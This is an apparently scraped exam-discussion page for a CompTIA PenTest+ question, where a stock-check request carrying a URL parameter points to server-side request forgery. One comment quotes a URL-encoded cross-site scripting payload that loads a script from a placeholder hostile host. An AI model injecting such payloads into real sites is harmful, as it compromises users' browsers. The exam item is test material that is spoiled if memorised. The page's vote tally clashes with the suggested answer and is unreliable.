ExamTopics Logo
Mail Us[email protected]
Menu
Comptia Discussions
exam questions

Exam PT0-002 All Questions

View all questions & answers for the PT0-002 exam
Go to Exam

Exam PT0-002 topic 1 question 259 discussion

Actual exam question from CompTIA's PT0-002
Question #: 259
Topic #: 1
[All PT0-002 Questions]

While performing an assessment on a web application, a penetration tester notices the web browser creates the following request when clicking on the stock status for an item:


POST /product/stock HTTP/1.0 -
Content-Type: application/x-www-form-urlencoded

Content-Length: 118 -

stockApi=http://stock.shop.com:8080/product/stock/check%3FproductId%3D6%26storeId%3D1

Which of the following types of attacks would the penetration tester most likely try NEXT?

  • A. Cross-site scripting
  • B. Command injection
  • C. Local file inclusion
  • D. Server-side request forgery
Show Suggested Answer Hide Answer
Suggested Answer: D 🗳️
by Gway at Nov. 17, 2023, 3:01 a.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
041ba31
10 months, 4 weeks ago
Selected Answer: D
The scenario describes a situation where the application makes a server-side request based on a URL provided by the user. SSRF attacks exploit this behavior to force the server to make requests to unintended locations, potentially accessing internal services.
upvoted 2 times
...
WANDOOCHOCO
1 year ago
Selected Answer: D
https://portswigger.net/web-security/ssrf
upvoted 2 times
...
LiveLaughToasterBath
1 year ago
Selected Answer: A
Examples of typical URL-Encoded attacks Cross-Site Scripting Excerpt from an arbitrary web page - �getdata.php�: echo $HTTP_GET_VARS[�data�]; URL-Encoded attack: http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2f www.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e HTML execution: <script src=�http://www.badplace.com/nasty.js�></script>
upvoted 2 times
...
Gway
1 year, 2 months ago
Selected Answer: D
D. Server-side request forgery SSRF attacks could be the next logical step for the tester to attempt, as the observed behavior suggests that the application may be including user-supplied URLs in server-side requests. The penetration tester could try to exploit this by crafting a URL that causes the server to make a request to an unintended location, potentially leading to information disclosure or unauthorized actions.
upvoted 1 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel